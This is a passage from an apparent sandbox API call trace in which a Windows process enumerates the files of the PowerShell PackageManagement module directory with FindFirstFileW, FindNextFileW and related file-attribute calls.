dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0170.821] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0170.821] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0170.821] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0170.821] FindNextFileW (in: hFindFile=0x1e35146a820, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0170.822] FindClose (in: hFindFile=0x1e35146a820 | out: hFindFile=0x1e35146a820) returned 1 [0170.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a870) returned 1 [0170.822] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8a350, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0170.822] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8a580 | out: lpFindFileData=0xb156f8a580*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146bde0 [0170.822] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.823] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0170.823] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0170.823] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0170.823] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0170.824] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0170.824] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0170.824] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0170.824] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0170.824] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0170.825] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0170.825] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0170.825] FindNextFileW (in: hFindFile=0x1e35146bde0, lpFindFileData=0xb156f8a540 | out: lpFindFileData=0xb156f8a540*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0170.825] FindClose (in: hFindFile=0x1e35146bde0 | out: hFindFile=0x1e35146bde0) returned 1 [0170.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7a0) returned 1 [0170.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a760) returned 1 [0170.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8a430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0170.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a880) returned 1 [0170.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8a960 | out: lpFileInformation=0xb156f8a960*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0170.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a840) returned 1 [0170.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a8d0) returned 1 [0170.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8a3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0170.826] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8a5e0 | out: lpFindFileData=0xb156f8a5e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b000 [0170.826] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.827] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0170.827] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0170.827] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0170.827] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0170.828] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0170.828] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0170.828] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0170.828] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0170.829] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0170.829] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0170.829] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0170.830] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8a5a0 | out: lpFindFileData=0xb156f8a5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0170.830] FindClose (in: hFindFile=0x1e35146b000 | out: hFindFile=0x1e35146b000) returned 1 [0170.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a800) returned 1 [0170.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a7c0) returned 1 [0170.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0170.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0170.830] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0170.834] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0170.834] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0170.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8a5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0170.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa10) returned 1 [0170.835] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0xb156f8aaf0 | out: lpFileInformation=0xb156f8aaf0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0170.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a9d0) returned 1 [0170.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8aa60) returned 1 [0170.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8a540, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0170.835] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8a770 | out: lpFindFileData=0xb156f8a770*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0170.835] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a730 | out: lpFindFileData=0xb156f8a730*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.836] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8a730 | out: lpFindFileData=0xb156f8a730*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 